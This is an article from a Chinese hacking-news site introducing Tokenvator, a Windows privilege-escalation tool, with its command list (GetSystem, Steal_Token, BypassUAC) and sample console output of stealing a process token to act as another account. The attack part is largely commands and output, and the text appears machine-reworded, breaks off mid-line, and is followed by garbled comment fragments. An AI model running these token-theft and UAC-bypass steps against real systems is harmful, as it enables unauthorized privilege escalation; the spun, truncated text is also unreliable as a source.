如何使用Tokenvator和Windows Tokens实现提权

如何使用Tokenvator和Windows Tokens实现提权

黑客软件hacker2018-06-12 19:10:539663A+A-

"今日给大伙儿详细介绍的是这款全名是Tokenvator的专用工具,该专用工具选用.NET开发设计,可用以在Windows系统软件中提权。

如何使用Tokenvator和Windows Tokens实现提权 第1张

专用工具免费下载

下载链接:【GitHub传送门】

基础应用

Tokenvator能够立即在互动式终端设备中运作,主要的运行命令可以以命令行参数的方式出示。在互交方式下,能够用tab键补齐指令,或双击鼠标tab键获得协助信息内容。

C:\Users\badjuju>Tokenvator.exe

(Tokens)> help

Name                     Optional            Required

----                     --------            --------

GetSystem                Command             -

GetTrustedInstaller      Command             -

Steal_Token              Command             ProcessID

BypassUAC                ProcessID           Command

List_Privileges          ProcessID           -

Set_Privilege            ProcessID           Privilege

List_Processes           -                   -

List_Processes_WMI       -                   -

Find_User_Processes      -                   User

Find_User_Processes_WMI  -                   User

List_User_Sessions       -                   -

WhoAmI                   -                   -

RevertToSelf             -                   -

Run                      -                   Command

 

(Tokens)> WhoAmI

Name                     Optional            Required

----                     --------            --------

WhoAmI                   -                   -

 

(Tokens)> WhoAmI

[*]Operating as LAB\badjuju

下边绝大多数截屏显示信息的是在互交方式下的指令运作状况:

Steal_Token

从最基础的作用而言,Tokenvator能够用于浏览并改动Windows验证令牌,以便获得到特殊系统进程的令牌,人们必须融合总体目标系统进程的PID来运作Steal_Token指令。

(Tokens)> Steal_Token Name                     Optional            Required ----                     --------            -------- Steal_Token              Command             ProcessID  

(Tokens)> Steal_Token 7384 [*]Adjusting Token Privilege [+]Received luid [*]AdjustTokenPrivilege [+]Adjusted Token To: SeDebugPrivilege [*]Impersonating 7384 [+]Recieved Handle For:  (7384) [+]Process Handle: 824 [+]Primary Token Handle: 828 [+]Duplicate Token Handle: 824

 

(Tokens)> whoami [*]Operating as lab\backup

或是人们还可以加上附加的指令选择项来应用新的浏览令牌。

(Tokens)> Steal_Token 7384 powershell.exe [*]Adjusting Token Privilege [+]Rece


点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 3条评论
  • 喜忧女2022-05-29 11:40:41
  • ;         -------- Steal_Token           
  • 孤鱼未芩2022-05-29 08:13:28
  •                    -            &n
  • 弦久鹿岛2022-05-29 11:32:17
  • ken从最基础的作用而言,Tokenvator能够用于浏览并改动Windows验证令牌,以便获得到特殊系统进程的令牌,人们必须融合总体目标系统进程的PID来运作Steal_Token指令。(Tokens)> Steal_Token Name     

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理